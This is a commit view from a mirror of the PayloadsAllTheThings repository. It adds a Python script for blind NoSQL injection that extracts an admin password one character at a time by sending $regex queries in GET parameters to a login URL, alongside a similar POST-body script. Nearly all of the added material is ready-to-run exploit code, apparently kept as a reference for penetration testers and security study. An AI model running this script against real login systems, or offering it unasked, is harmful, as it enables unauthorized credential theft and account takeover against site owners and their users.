mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
add nosqli GET example
This commit is contained in:
parent
49b9d0aff7
commit
e467d6096a
@ -50,6 +50,9 @@ Extract data with "in"
|
|||||||
|
|
||||||
## Blind NoSQL
|
## Blind NoSQL
|
||||||
|
|
||||||
|
### POST with JSON body
|
||||||
|
|
||||||
|
|
||||||
```python
|
```python
|
||||||
import requests
|
import requests
|
||||||
import urllib3
|
import urllib3
|
||||||
@ -59,6 +62,7 @@ urllib3.disable_warnings()
|
|||||||
|
|
||||||
username="admin"
|
username="admin"
|
||||||
password=""
|
password=""
|
||||||
|
u="http://example.org/login"
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
for c in string.printable:
|
for c in string.printable:
|
||||||
@ -70,6 +74,29 @@ while True:
|
|||||||
password += c
|
password += c
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### GET
|
||||||
|
|
||||||
|
```python
|
||||||
|
import requests
|
||||||
|
import urllib3
|
||||||
|
import string
|
||||||
|
import urllib
|
||||||
|
urllib3.disable_warnings()
|
||||||
|
|
||||||
|
username='admin'
|
||||||
|
password=''
|
||||||
|
u='http://example.org/login'
|
||||||
|
|
||||||
|
while True:
|
||||||
|
for c in string.printable:
|
||||||
|
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||||
|
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||||
|
r = requests.get(u + payload)
|
||||||
|
if 'Yeah' in r.text:
|
||||||
|
print("Found one more char : %s" % (password+c))
|
||||||
|
password += c
|
||||||
|
```
|
||||||
|
|
||||||
## MongoDB Payloads
|
## MongoDB Payloads
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
Loading…
Reference in New Issue
Block a user